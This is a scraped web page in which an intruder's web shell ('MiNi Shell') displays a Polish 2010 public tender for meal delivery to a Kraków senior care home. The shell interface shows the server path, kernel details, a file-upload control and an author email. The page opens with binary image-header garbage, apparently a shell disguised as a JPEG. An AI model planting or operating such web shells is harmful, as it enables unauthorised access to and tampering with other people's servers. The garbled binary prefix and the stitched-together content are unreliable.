JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100805/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100805/239678-N-2010.html

<p class="kh_header"><b>Kraków: przygotowanie i dostawa codziennego wyżywienia dla mieszkańców z uwzględnieniem diet i kaloryczności   do Domu Pomocy  Społecznej  Seniora Naftowca w Krakowie, ul. Kluzeka 6, w okresie 61 dni</b><br>
<b>Numer ogłoszenia: 239678 - 2010; data zamieszczenia: 05.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej "Seniora Naftowca" , ul. Kluzeka 6, 31-222 Kraków, woj. małopolskie, tel. 012 4152592, faks 012 4152592 w. 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpskluzeka.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: pomoc społeczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> przygotowanie i dostawa codziennego wyżywienia dla mieszkańców z uwzględnieniem diet i kaloryczności   do Domu Pomocy  Społecznej  Seniora Naftowca w Krakowie, ul. Kluzeka 6, w okresie 61 dni.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest: przygotowanie i dostawa codziennego wyżywienia dla mieszkańców DPS z uwzględnieniem diet i kaloryczności   do Domu Pomocy  Społecznej  Seniora Naftowca w Krakowie, ul. Kluzeka 6, w okresie 61 dni
2.Szacunkowa ilość -  5490 osobodni ( Udzielający zamówienia oświadcza, że wskazana ilość posiłków ma charakter wyłącznie szacunkowy, a rzeczywista ilość w ramach zamówienia stanowiącego przedmiot zamówienia wynikać będzie z bieżących potrzeb Zamawiającego. Ilość mieszkańców w DPS - 90 osób)
3.Posiłki dla mieszkańców powinny uwzględniać następujące diety: 
Dieta I podstawowa, tzw. normalna 
Dieta II cukrzycowa / 6 posiłków na dobę w tym jeden nocny / 
Dieta III bez soli 
Dieta V wątrobowa 
Dieta VI wysokobiałkowa 
Dieta VII niskobiałkowa 
Dieta VIII płynna - miksowana
Dieta I - podstawowa stanowi ok. 80% posiłków
Zlecane są też diety specjalistyczne na zlecenie lekarza nie ujęte w procedurach.
4.Zalecane normy kalorii i składników pokarmowych obliczone na osobodzień: 

Kalorie ok. 2200 -2400 
Węglowodany ok. 300 g 
Białko ogółem ok. 70 g w tym białko zwierzęce ok. 20-30 g 
Tłuszcz ok. 70 g 
Białko powinno pokrywać od 13-16% całodobowego zapotrzebowania kalorycznego, tłuszcze 
nie więcej niż 30% całodobowego zapotrzebowania kalorycznego natomiast reszta kalorii 
powinna zostać pokryta przez węglowodany. 

Zobowiązuje się wykonawcę do przestrzegania normatywnych wartości energetycznych, 
wartości odżywczych i smakowych potraw oraz do przygotowywania ich zgodnie z prawnymi 
regulacjami o warunkach zdrowotnych żywności i żywienia, przy równoczesnym zapewnieniu 
modyfikacji opracowanych jadłospisów przez urozmaicenia, sezonowość.
5. Żywienie mieszkańców obejmuje: 
a) sporządzanie posiłków w ilościach wynikających ze stanu mieszkańców  z uwzględnieniem zaleceń dietetycznych, 
b) zastosowanie systemu tacowego / indywidualne tace żywieniowe wyposażone w zastawę lub równoważne z dostawą do DPS( na terenie DPS nie ma możliwości mycia , porcjowania)
c) dystrybucja wyporcjowanych tac żywieniowych do mieszkańców  przez pracowników 
DPS
c) odbiór tac żywieniowych( lub pojemników jednorazowego użycia  i utylizacja odpadów pokonsumpcyjnych). 

6. Wykonawca powinien: 
1) Zapewnić dostarczanie posiłków we wszystkie dni tygodnia 3 razy dziennie zgodnie z 
poniższymi zasadami: 
śniadanie 7:00 -7:30
obiad 12:00 - 12:30
kolacja 17:30 - 18:00
dodatkowe posiłki dotyczące np. diety cukrzycowej będą po uzgodnieniu z wykonawcą 
dostarczane w następujący sposób: 
-drugie śniadanie razem z pierwszym śniadaniem 
-podwieczorek razem z obiadem 
-posiłek nocny razem z kolacją. 

2) zobowiązany jest do udostępnienia upoważnionemu przedstawicielowi 
Zamawiającego jednej porcji każdego posiłku do degustacji w zakresie diety podstawowej 
w celu dokonania kontroli wagi i estetyki zestawionego posiłku . 

3) po zakończeniu pory wydawania poszczególnych posiłków wykonawca odbierze odpady 
pokonsumpcyjne, brudne naczynia, sztućce i inne narzędzia służące do dostarczania i 
przechowywania żywności od zamawiającego oraz zapewni we własnym zakresie 
ich mycie i dezynfekcję we własnych pomieszczeniach zgodnie z zasadami i przepisami 
sanitarnymi i mikrobiologicznymi oraz normami HACCP 

4) dostarczać dokumentację potwierdzającą ilość dostarczonych posiłków przy śniadaniu za 
dzień poprzedni i odebrać potwierdzoną przez zamawiającego dokumentację przy dostawie 
obiadu, 

5) pomiar temperatury odbywać się będzie w momencie przekazania posiłków do DPS:
 zupa - 75°C, II danie - 65°C. , napoje gorące - 80°C. , produkty zimne -15°C.    

6) Odpadki będą odbierane przez wykonawcę wraz z brudnymi naczyniami. Wykonawca 
dostarczy nieodpłatnie zamawiającemu pojemniki na brudne tace. 

7) Indywidualne tace żywieniowe wraz z zastawą oraz inne naczynia transportowe w których 
pakowana jest żywność mają być czyste, bez uszkodzeń, bez znaczących zmian 
fizycznych mogących przyczynić się do zagrożenia epidemiologicznego 

8) pojemniki, termosy zamykane szczelnie tak by podczas transportu posiłki w formie 
płynnej nie ulegały rozlaniu, 

9) dostarczyć elastyczny jadłospis do wtorku na następny tydzień oraz uzgodnić go z 
osobą upoważnioną i zatwierdzić do piątku.  

10) Jadłospisy będą podlegać kontroli Zamawiającego.  Wykonawca zobowiązuje się do przedstawiania osobie upoważnionej jadłospisów zawierających poza nazwami posiłków: ilości wyrażone w gramach lub sztukach,kaloryczność i skład produktów żywnościowych mogących wchodzić w rodzaj danej diety, na kolejny tydzień, najpóźniej na trzy dni robocze przed terminem obowiązywania jadłospisu.

11) używać masło świeże extra, a nie produkty masłopodobne 

12) wędliny mają być wysokiej jakości, mają nie zawierać dodatków skrobi, soji,  mięso nie 
może być MMO (mięso mechanicznie odkostnione), 

13) Reklamacje dotyczące składu jakościowego i ilościowego tacy żywieniowej (np. brak masła) 
będą zgłaszane wykonawcy telefonicznie oraz w formie pisemnej. 

14) co najmniej 1 raz w tygodniu należy dostarczać wykaz poszczególnych produktów z 
których został sporządzony posiłek wraz z wykazem gramatury, 

15) zaleca się, aby Wykonawca  pobierał i przechowywał próbki podanych posiłków w 
specjalnie przeznaczonych do tego lodówkach przez okres 72 godz od upływu dnia ich podania 

16) Zamawiający będzie dokonywał kontroli wartości wsadu do kotła poprzez wezwanie 
wykonawcy do okazania raportów żywienia. W razie wątpliwości raz w m-cu zamawiający 
ma prawo na koszt wykonawcy do weryfikacji tych raportów przez PIH. Średnia wartość 
dziennego wsadu do kotła określona na podstawie raportów może wahać się w okresie 
tygodnia w granicach ? 5%. 

17) Za uchybienia ujawnione w trakcie kontroli np. SANEPIDu wynikające ze świadczonej przez 
Wykonawcę usługi, której następstwem będą m.in. mandaty, kary odpowiada Wykonawca. 

8. Zasady zamawiania  posiłków: 
1) Zamawianie posiłków odbywać się będzie w dniu poprzedzającym ich dostarczenie do godz. 11:00  na podstawie pisemnych zamówień posiłków przez osoby upoważnione.
Zamówienie na posiłki dostarczane na niedzielę i poniedziałek będą zamawiane w piątek.
2) Korekta zamówienia w dniu dostawy 
- ilości obiadów /łącznie z dietami /  do godz. 10:00
- ilości kolacji  /łącznie z dietami /  do godz.13:30
- ilości śniadań  /łącznie z dietami /   na dzień następny do godz. 14:30 
 Złożenie korekty odbywać się będzie faxem lub telefonicznie. 
3) Podstawą do sporządzania posiłków dla mieszkańców  będą :

a) wykaz norm dziennych racji pokarmowych dla zakładów żywienia zbiorowego  typu zamkniętego opracowany przez Instytut Żywności i Żywienia oraz norm HCCAP.
b) wykaz diet stosowanych w DPS.

4 Wszelkie posiłki powinny być przygotowywane zgodnie z obowiązującymi normami
żywieniowymi wg Instytutu Żywienia i Żywności, jak również przepisami prawa w zakresie
higieny żywienia norm HCCAP oraz wewnętrznymi przepisami Zamawiającego.



2. Warunki dodatkowe:
a)Podana cena brutto na realizację zamówienia winna uwzględniać wszelkie rabaty i upusty zastosowane dla zamawiającego,. Podana przez Wykonawcę cena brutto będzie traktowana przy ocenie ofert jako cena ostateczna. 
b) Ofertę sporządza się w języku polskim (łącznie z wymaganymi dokumentami), z zachowaniem formy pisemnej pod rygorem nieważności..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>do 20% zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.20.00-3, 55.32.10.00-6, 55.52.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 61.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli Wykonawca wykaże, nie później niż na dzień składania ofert, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, należycie wykonał( a w przypadku świadczeń okresowych lub ciągłych - również wykonuje przygotowanie i dostawę calodziennego wyżywienia o łącznej wartości na miesiąc  nie mniejszej niż 20000 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">W zakresie potwierdzenia ,że oferowana usługa odpowiada określonym wymaganiom należy przedłożyć oświadczenie, iż oferowany przedmiot spełnia wymogi Polskiej Normy oraz wymogi określone w ustawie 25.08.2006r. O bezpieczeństwie żywności i żywienia(Dz. U. Z 2006r. Nr 171.poz.1225) oraz transport  wykonywany będzie środkami transportu spełniającymi wymagania sanitarne.</p></li>



</ul>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zamawiający wymaga od wykonawcy, aby zawarł z nim umowę w sprawie zamówienia publicznego na  warunkach określonych we wzorze umowy stanowiącym załącznik nr 3 do siwz.
2.Zakazuje się zmian postanowień zawartej umowy oraz wprowadzania nowych postanowień do umowy niekorzystnych dla Zamawiającego, jeżeli przy ich uwzględnieniu należałoby zmienić treść oferty, na podstawie, której dokonano wyboru oferenta, chyba, że konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpskluzeka.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej
ul. Kluzeka6
31-222 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.08.2010 godzina 08:00, miejsce: Dom Pomocy Społecznej
ul. Kluzeka6
31-222 Kraków.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com